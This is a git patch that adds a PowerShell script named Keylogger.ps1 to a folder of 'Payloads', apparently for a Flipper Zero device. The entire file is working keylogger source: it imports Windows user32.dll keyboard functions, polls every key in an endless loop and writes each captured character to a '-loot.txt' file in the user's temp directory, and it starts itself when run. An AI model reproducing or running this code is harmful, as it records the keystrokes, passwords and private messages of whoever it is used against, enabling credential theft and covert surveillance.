From 2488a38a91ce01f727b8a008b2933a1de519444f Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby <Michaelryanchitwood@gmail.com>
Date: Thu, 22 Dec 2022 22:50:35 -0600
Subject: [PATCH] Create Keylogger.ps1

---
 Payloads/Flip-Keylogger/Keylogger.ps1 | 62 +++++++++++++++++++++++++++
 1 file changed, 62 insertions(+)
 create mode 100644 Payloads/Flip-Keylogger/Keylogger.ps1

diff --git a/Payloads/Flip-Keylogger/Keylogger.ps1 b/Payloads/Flip-Keylogger/Keylogger.ps1
new file mode 100644
index 0000000..98ed62b
--- /dev/null
+++ b/Payloads/Flip-Keylogger/Keylogger.ps1
@@ -0,0 +1,62 @@
+function XXXlog($Path="$env:temp\$env:UserName-loot.txt"){
+  $signatures = @'
+  [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
+  public static extern short GetAsyncKeyState(int virtualKeyCode); 
+  [DllImport("user32.dll", CharSet=CharSet.Auto)]
+  public static extern int GetKeyboardState(byte[] keystate);
+  [DllImport("user32.dll", CharSet=CharSet.Auto)]
+  public static extern int MapVirtualKey(uint uCode, int uMapType);
+  [DllImport("user32.dll", CharSet=CharSet.Auto)]
+  public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
+'@
+
+  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
+    
+
+  $null = New-Item -Path $Path -ItemType File -Force
+
+  try
+  {
+    Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
+
+    while ($true) {
+      Start-Sleep -Milliseconds 40
+      
+
+      for ($ascii = 9; $ascii -le 254; $ascii++) {
+
+        $state = $API::GetAsyncKeyState($ascii)
+
+
+        if ($state -eq -32767) {
+          $null = [console]::CapsLock
+
+
+          $virtualKey = $API::MapVirtualKey($ascii, 3)
+
+
+          $kbstate = New-Object Byte[] 256
+          $checkkbstate = $API::GetKeyboardState($kbstate)
+
+
+          $mychar = New-Object -TypeName System.Text.StringBuilder
+
+          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
+
+          if ($success) 
+          {
+
+            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
+          }
+        }
+      }
+    }
+  }
+  finally
+  {
+
+    #notepad $Path
+  }
+}
+
+XXXlog